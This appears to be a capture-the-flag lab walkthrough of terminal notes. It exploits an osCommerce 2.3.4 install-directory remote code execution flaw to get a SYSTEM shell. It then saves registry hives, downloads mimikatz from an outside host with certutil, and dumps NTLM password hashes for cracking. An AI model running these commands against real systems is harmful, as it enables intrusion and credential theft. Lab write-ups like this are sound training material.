

on port 8080 we find osCommerce 2.3.4

osCommerce 2.3.4 - Multiple Vulnerabilities                                        | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection                                      | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Injection                                   | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injection                                    | php/webapps/46330.txt
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting                       | php/webapps/49103.txt
osCommerce 2.3.4.1 - Arbitrary File Upload                                         | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution                                         | php/webapps/44374.py
osCommerce 2.3.4.1 - Remote Code Execution (2)                                     | php/webapps/50128.py


┌──(root㉿kali)-[/home/kali]
└─# cat 44374.py           
# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject



┌──(root㉿kali)-[/home/kali]
└─# python3 50128.py http://10.201.113.117:8080/oscommerce-2.3.4/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system

RCE_SHELL$ whoami
nt authority\system

RCE_SHELL$ reg save hklm\sam C:\Windows\Temp\sam && reg save hklm\system C:\Windows\Temp\system
The operation completed successfully.
The operation completed successfully.

RCE_SHELL$ 

unable to get another rev shell through this easily. and unable to get the system.b64 to type out



RCE_SHELL$ certutil.exe -f -urlcache http://192.168.141.97:8000/mimikatz.exe mimi.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.



RCE_SHELL$ mimi.exe lsadump::sam exit > C:\Windows\Temp\mimi_sam.txt 2>&1

RCE_SHELL$ type C:\Windows\Temp\mimi_sam.txt

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::sam
Domain : BLUEPRINT
SysKey : 147a48de4a9815d2aa479598592b086f
Local SID : S-1-5-21-3130159037-241736515-3168549210

SAMKey : 3700ddba8f7165462130a4441ef47500

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 549a1bcb88e35dc18c7a0b0168631411

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : Lab
  Hash NTLM: 30e87bf999828446a1c1209ddde4c450

mimikatz(commandline) # exit
Bye!

RCE_SHELL$ 


this Lab user ntlm hash can be cracked on ntlm.pw or crackstation



